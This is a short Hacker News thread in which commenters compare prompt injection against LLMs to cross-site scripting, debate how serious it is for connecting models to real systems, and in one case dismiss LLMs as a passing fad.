Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

How is this any different from what JavaScript in a webpage can do? It can happily read an input form value and post, put, or even get with query parameter to send the response anywhere on the internet.


XSS vulnerabilities on the web are massive. The entire web security model is based around trying to restrict them, and that comes with downsides that limit capabilities.

If prompt injection is "only" as serious as an XSS attack, then that would be enough to upend most of the thinking we have today about how we'll be able to wire LLMs to real world systems.


No one is wiring LLMs to real world systems. This is a flash in the pan that will be forgotten and fully derided in months/years like NFTs, self driving, etc. It's a trap for people to waste time and attention thinking about.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: